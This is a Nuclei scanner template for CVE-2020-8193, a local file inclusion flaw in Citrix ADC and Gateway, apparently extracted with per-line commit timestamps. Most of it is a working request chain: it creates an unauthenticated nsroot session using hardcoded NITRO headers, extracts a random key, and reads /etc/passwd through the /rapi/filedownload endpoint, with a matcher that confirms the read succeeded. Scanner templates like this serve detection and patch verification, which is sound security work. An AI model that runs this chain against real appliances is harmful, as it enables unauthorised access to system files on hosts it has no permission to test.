2021-01-02 04:56:15 +00:00
id : CVE-2020-8193
2020-07-11 10:15:20 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Citrix - Local File Inclusion
2020-07-11 10:15:20 +00:00
author : pdteam
2021-09-10 11:26:40 +00:00
severity : medium
2022-07-26 13:45:11 +00:00
description : Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints.
2021-03-16 15:19:01 +00:00
reference :
2021-03-16 15:08:01 +00:00
- https://github.com/jas502n/CVE-2020-8193
- http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html
2022-05-17 09:18:12 +00:00
- https://support.citrix.com/article/CTX276688
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-8193
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-8193
2023-07-11 19:49:27 +00:00
cwe-id : CWE-287,CWE-284
2023-07-15 16:29:17 +00:00
epss-score : 0.97455
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 6
2023-07-11 19:49:27 +00:00
vendor : citrix
product : application_delivery_controller_firmware
tags : cve,cve2020,citrix,lfi,kev,packetstorm
2020-07-11 10:15:20 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-07-11 10:15:20 +00:00
- raw :
- |
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host : {{Hostname}}
Content-Type : application/xml
X-NITRO-USER : xpyZxwy6
X-NITRO-PASS : xWXHUJ56
<appfwprofile><login></login></appfwprofile>
2020-08-02 12:58:07 +00:00
- |
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host : {{Hostname}}
- |
GET /menu/neo HTTP/1.1
Host : {{Hostname}}
- |
GET /menu/stc HTTP/1.1
Host : {{Hostname}}
- |
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host : {{Hostname}}
Content-Type : application/xml
X-NITRO-USER : oY39DXzQ
X-NITRO-PASS : ZuU9Y9c1
2022-04-29 05:04:34 +00:00
rand_key : {{randkey}}
2020-08-02 12:58:07 +00:00
<appfwprofile><login></login></appfwprofile>
- |
POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
Host : {{Hostname}}
Content-Type : application/xml
X-NITRO-USER : oY39DXzQ
X-NITRO-PASS : ZuU9Y9c1
2022-04-29 19:58:07 +00:00
rand_key : {{randkey}}
2020-08-02 12:58:07 +00:00
<clipermission></clipermission>
cookie-reuse : true
2023-07-11 19:49:27 +00:00
matchers :
2020-08-02 12:58:07 +00:00
- type : regex
part : body
regex :
2023-07-11 19:49:27 +00:00
- "root:.*:0:0:"
2020-08-02 12:58:07 +00:00
2023-07-11 19:49:27 +00:00
extractors :
2020-08-02 12:58:07 +00:00
- type : regex
2023-07-11 19:49:27 +00:00
name : randkey # dynamic variable
2020-08-02 12:58:07 +00:00
regex :
2023-07-11 19:49:27 +00:00
- "(?m)[0-9]{3,10}\\.[0-9]+"
internal : true
2022-04-29 05:04:34 +00:00
part : body